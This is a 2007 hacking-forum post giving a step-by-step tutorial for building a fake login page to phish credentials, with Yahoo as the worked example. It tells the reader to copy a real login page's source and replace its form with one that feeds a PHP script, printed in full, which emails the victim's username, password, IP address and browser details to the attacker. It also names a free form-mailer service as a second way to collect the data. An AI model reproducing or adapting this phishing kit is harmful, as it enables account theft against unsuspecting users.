I.G
Would you like to react to this message? Create an account in a few clicks or log in to continue.
I.G

Hackers Team
 
HomeSearchLatest imagesRegisterLog in

 

 Make your own fake login page

Go down 
AuthorMessage
rebel
iG Founder
iG Founder
rebel


Number of posts : 130
Age : 35
Localisation : Your Computer!
Registration date : 2007-01-20

Make your own fake login page Empty
PostSubject: Make your own fake login page   Make your own fake login page Icon_minitimeSat Jan 20, 2007 3:05 pm

This Tutorial works for any site basically

First you will need to get a copy of the source code of the site.
so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html.
either way youl need a copy of the login.html on your desktop.

now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like

Quote:

<img>
And change them to



<img>
or save all the images and host them on your own image hosting account.

then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.

Now we have to enter the script that will mail us the name and pass.
you have to look through your login.html and find the section of code that creates the login boxs and delete it.
On Yahoo login this is the part of the source that needs to be replaced.

Quote:

<table border="0" cellpadding="2" cellspacing="0">
<tr> <td align="right"><font face="arial" size="-1">
Yahoo! ID:
</font></td>
<td><input></td>
</tr>
<tr> <td align="right"><font face="arial" size="-1">Password:</font></td>
<td><input></td></tr>
<tr> <td colspan="2" align="center"><font face="arial" size="-1">

Now, this can be replaced by one of two things.
If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on.
Using php require 2 files. the login.html and thanks.php
To use php replace the previous login script shown above with the following html.

Quote:

<html>
<form>
Yahoo! ID <input> <br>
Password <input> <br>
<input>
</form>
</html>

And in the same folder put this script (unedited) to actually grab the entered info and mail it to you.
thanks.php

Quote:

<script>
$email = $HTTP_POST_VARS[email];
$mailto = "Your Email Goes Here";
$mailsubj = "Form submission";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) {
$mailbody .= "$key : $val\n"; }
mail($mailto, $mailsubj, $mailbody, $mailhead);
</SCRIPT>

Call the second script thanks.php
This script will send you thier name, password, ip, operating system, and browser type to you in the email.

Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do.
so this method can be hosted on a geocities account.
You need to go to http://www.response-o-matic.com and get thier free email script that can be dropped into any html.

youl need to alter the script for it to work. i dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the original yahoo login code thats higlighted at the top of this page.
Back to top Go down
http://insanegamers.net.tc
 
Make your own fake login page
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
I.G :: Downloads :: Files-
Jump to: